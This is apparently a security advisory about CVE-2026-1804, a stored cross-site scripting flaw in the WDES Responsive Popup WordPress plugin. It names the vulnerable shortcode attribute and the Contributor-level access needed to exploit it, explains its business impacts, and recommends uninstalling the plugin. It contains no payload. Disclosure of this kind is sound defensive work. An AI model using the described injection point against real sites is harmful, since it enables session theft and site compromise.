Attack Vectors

WDES Responsive Popup (slug: wdes-responsive-popup) has a Medium severity vulnerability (CVSS 6.4, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N) tracked as CVE-2026-1804. The issue affects all versions up to and including 1.3.6.

The primary attack path is through an authenticated WordPress account with at least Contributor permissions. An attacker with this access can place a crafted wdes-popup-title shortcode on a page or post and use the attr shortcode attribute to inject script content that is then saved (stored) in your site’s content.

Because this is a stored cross-site scripting (XSS) issue, the malicious content can execute later—whenever someone visits the affected page—without requiring the visitor to click a suspicious link or take any special action.

Security Weakness

This vulnerability exists because WDES Responsive Popup does not adequately sanitize and safely output user-supplied shortcode attributes. Specifically, insufficient input sanitization and output escaping of the attr value in the wdes-popup-title shortcode can allow script injection to be stored in the database and rendered to site visitors.

In practical terms, the plugin is trusting content that should be treated as untrusted—especially content created by users who can contribute posts but should not be able to run scripts in the browser of other users.

Remediation note: per the published advisory, there is no known patch available at this time. Organizations should weigh mitigations based on risk tolerance; in many environments, the safest option is to uninstall the affected plugin and replace it.

Technical or Business Impacts

Stored XSS can create business risk that extends beyond “a website bug.” If a malicious script runs in a visitor’s browser, it can undermine trust and alter how your brand is experienced—particularly on high-traffic landing pages, campaign pages, and lead-capture flows.

Potential impacts include:

Brand and reputation damage: Visitors may see unexpected popups, content changes, redirects, or other behavior that erodes confidence in your organization’s professionalism and security posture.

Customer and employee risk: If privileged users (marketing admins, site admins, editors) view an injected page, their sessions may be exposed to increased risk depending on what the injected script attempts to do, potentially leading to broader site compromise.

Compliance and audit concerns: For regulated organizations, a web security incident—even without service downtime—can trigger incident response obligations, documentation requirements, and uncomfortable questions about access controls and third-party software governance.

Campaign performance and revenue impact: Any disruption to on-site user journeys (forms, tracking, conversion flows) can reduce lead quality and conversion rates, and may require pausing campaigns while the site is remediated.

Similar attacks have been observed across the web in the form of stored XSS and script injection incidents affecting popular sites and platforms. For context, see: British Airways payment-page script injection coverage, Ticketmaster breach linked to third-party scripts, and Wordfence advisory for this issue.